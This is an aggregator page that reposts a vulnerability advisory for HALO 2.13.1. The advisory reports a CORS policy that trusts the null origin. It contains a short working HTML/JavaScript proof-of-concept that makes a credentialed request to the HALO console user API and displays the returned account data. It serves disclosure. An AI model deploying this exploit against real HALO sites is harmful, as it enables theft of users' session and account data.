Security
Headlines
HeadlinesLatestCVEs

Headline

HALO 2.13.1 CORS Issue

HALO version 2.13.1 has an insecure cross-origin resource sharing setting that allows an arbitrary origin.

Packet Storm
Open in Source
#vulnerability#web#git#auth

Title: HALO-2.13.1 Cross-origin resource sharing: arbitrary origin trusted

Author: nu11secur1ty

Date: 03/15/2024

Vendor: https://www.halo.run/

Software: https://github.com/halo-dev/halo

Reference: https://portswigger.net/web-security/cors

Description:

The application implements an HTML5 cross-origin resource sharing
(CORS) policy for this request that allows access from any domain.
The application allowed access from the requested origin null
The application allows two-way interaction from the null origin. This
effectively means that any domain can perform two-way interaction by
causing the browser to submit the null origin, for example by issuing
the request from a sandboxed iframe or malicious fishing domain with a
specially crafted HTML exploit.

STATUS: HIGH- Vulnerability

[+]Exploit:

<html>  
<body>  
<center>  
<h2>CORS POC Exploit  
<h3>Extract SID

<div id="demo">  
<button type="button" onclick="cors()">Exploit Click here  
</div>

<script>  
function cors() {  
var xhttp = new XMLHttpRequest();  
xhttp.onreadystatechange = function() {  
if (this.readyState == 4 && this.status == 200) {  
document.getElementById("demo").innerHTML = alert(this.responseText);  
}  
};  
xhttp.open("GET",  
"http://192.168.100.49:8090/apis/api.console.halo.run/v1alpha1/users/-",  
true);  
xhttp.withCredentials = true;  
xhttp.send();  
}  
</script>

</body>  
</html>

Reproduce:

href

Proof and Exploit:

href

Time spent:

00:25:00


System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty http://nu11secur1ty.com/


System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty http://nu11secur1ty.com/

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution
Packet Storm